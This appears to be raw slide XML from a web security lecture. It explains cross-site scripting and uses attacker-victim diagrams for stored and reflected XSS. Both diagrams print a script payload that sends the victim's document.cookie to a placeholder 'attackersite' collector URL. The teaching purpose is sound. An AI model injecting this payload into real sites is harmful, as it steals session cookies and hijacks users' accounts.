              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$statement-&gt;execute(); ...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Cross-Site Scripting (XSS)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The server sends unchecked/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> data to user’s browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Attackers may exploit the vulnerability to execute client-side scripts to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Hijack user sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Deface websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Conduct phishing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Types of cross-site scripting :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Reflected XSS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Stored XSS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zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="413268" y="1243415"/>
            <a:ext cx="8339882" cy="5301563"/>
            <a:chOff x="413268" y="1243413"/>
            <a:chExt cx="8339882" cy="5301563"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1958608" y="6206422"/>
              <a:ext cx="230197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 dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message Victim 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413268" y="1245651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A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ttacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4739158" y="6371718"/>
              <a:ext cx="656794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0" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1160268" y="6358229"/>
              <a:ext cx="656794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1" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478057" y="6204942"/>
              <a:ext cx="327509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 dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message Victim unaware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12" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="703063" y="6260298"/>
              <a:ext cx="7655151" cy="242456"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq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kumimoji="0" lang="zh-TW" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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4014144" y="1243413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Victim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7613340" y="1247515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V</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ulnerable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Website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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="直線接點 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-1255422" y="3956362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6" name="直線接點 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="2343774" y="3929066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7" name="直線接點 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="5942970" y="3942714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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="群組 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4601926" y="2631040"/>
            <a:ext cx="3470536" cy="369332"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="428493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19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20" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5037790" y="1643050"/>
              <a:ext cx="1840172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2.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Logon request</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="群組 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596452" y="3271366"/>
            <a:ext cx="3476010" cy="371949"/>
            <a:chOff x="4604640" y="2143116"/>
            <a:chExt cx="3511550" cy="431529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5000628" y="2146152"/>
              <a:ext cx="2754720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 3. </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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Set-Cookie: …</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="2143116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olid"/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18" name="群組 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4604770" y="3988362"/>
            <a:ext cx="3470536" cy="369332"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="428493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25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26" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5037790" y="1643050"/>
              <a:ext cx="2694557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4.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Read the bulletin board</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="群組 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4599297" y="4760792"/>
            <a:ext cx="3582396" cy="1311414"/>
            <a:chOff x="4599296" y="4000505"/>
            <a:chExt cx="3582396" cy="1311414"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="群組 42"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4599296" y="4000505"/>
              <a:ext cx="3476010" cy="371949"/>
              <a:chOff x="4604640" y="2143116"/>
              <a:chExt cx="3511550" cy="431529"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Text Box 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5000628" y="2146152"/>
                <a:ext cx="2968352" cy="4284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0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t> 5. </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1F497D"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Show the malicious script</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4604640" y="2143116"/>
                <a:ext cx="3511550" cy="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prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="triangle" w="med" len="med"/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr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>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4929190" y="4357812"/>
              <a:ext cx="3252502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&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.location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=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRP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“</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://attackersite/collect.cgi?cookie=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”</a:t>
              </a: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+ </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie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;</a:t>
              </a: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&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993190" y="5143512"/>
            <a:ext cx="3435934" cy="923330"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="1071230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33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1071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6.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The victim's browser runs the script and transmits the cookie to the attacker.</a:t>
              </a:r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34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28" name="群組 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1000100" y="2102513"/>
            <a:ext cx="7072362" cy="1326489"/>
            <a:chOff x="1000100" y="2155654"/>
            <a:chExt cx="7072362" cy="1326489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="群組 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1000100" y="2155654"/>
              <a:ext cx="7072362" cy="406458"/>
              <a:chOff x="4610990" y="1643050"/>
              <a:chExt cx="3505200" cy="406458"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Line 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4610990" y="1643050"/>
                <a:ext cx="3505200" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="E46C0A"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr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>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Text Box 21"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4681802" y="1680176"/>
                <a:ext cx="2556825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0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>1. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1F497D"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Post a malicious message onto the bulletin board.</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D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37" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1214414" y="2528036"/>
              <a:ext cx="3286148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&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.location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=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRP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“</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://attackersite/collect.cgi?cookie=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”</a:t>
              </a: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+ </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>document.cookie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;</a:t>
              </a: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&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="日期版面配置區 3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41" name="投影片編號版面配置區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42" name="頁尾版面配置區 4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Reflected XSS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1958609" y="6206422"/>
            <a:ext cx="230197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b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>message Victim aware of</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri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13268" y="1245653"/>
            <a:ext cx="1108348" cy="496701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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ttacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596452" y="2285994"/>
            <a:ext cx="3476010" cy="371949"/>
            <a:chOff x="4604640" y="2143116"/>
            <a:chExt cx="3511550" cy="431529"/>
          </a:xfrm>
        </p:grpSpPr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5000628" y="2146152"/>
              <a:ext cx="2754720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 2. </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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Set-Cookie: ID=A12345</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="2143116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olid"/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5" name="群組 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1006667" y="5209302"/>
            <a:ext cx="3422457" cy="1077218"/>
            <a:chOff x="1015735" y="4923550"/>
            <a:chExt cx="3505200" cy="1249768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071539" y="4923550"/>
              <a:ext cx="3357586" cy="1249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b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>7</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr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http://attackersite/collect.cgi?cookie=ID=A12345</a:t>
              </a:r>
            </a:p>
            <a:p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(cookie stolen by the attacker)</a:t>
              </a:r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13" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1015735" y="492919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8" name="群組 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4601926" y="1857364"/>
            <a:ext cx="3470536" cy="369332"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="428493"/>
          </a:xfrm>
        </p:grpSpPr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6" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5037790" y="1643050"/>
              <a:ext cx="1840172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1.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Logon request</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4739159" y="6371718"/>
            <a:ext cx="656794" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E46C0A"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln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18" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1160269" y="6358229"/>
            <a:ext cx="656794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19" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5478058" y="6204942"/>
            <a:ext cx="327509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b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>message Victim unaware of</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="703063" y="6260298"/>
            <a:ext cx="7655151" cy="242456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq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zh-TW" altLang="en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRP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4014144" y="1243415"/>
            <a:ext cx="1108348" cy="496701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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr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7613340" y="1247517"/>
            <a:ext cx="1108348" cy="496701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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Website</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="群組 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993190" y="2428870"/>
            <a:ext cx="3435934" cy="646331"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="749861"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24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749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3.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Request by c</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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licking unwittingly a link to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A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0"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ttacker’s site</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="直線接點 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="-1255422" y="3956362"/>
            <a:ext cx="4429156" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625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7" name="直線接點 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5942970" y="3942714"/>
            <a:ext cx="4429156" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="群組 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4184317" y="4803221"/>
            <a:ext cx="3837994" cy="1483301"/>
            <a:chOff x="4184672" y="4500570"/>
            <a:chExt cx="3931518" cy="1720897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
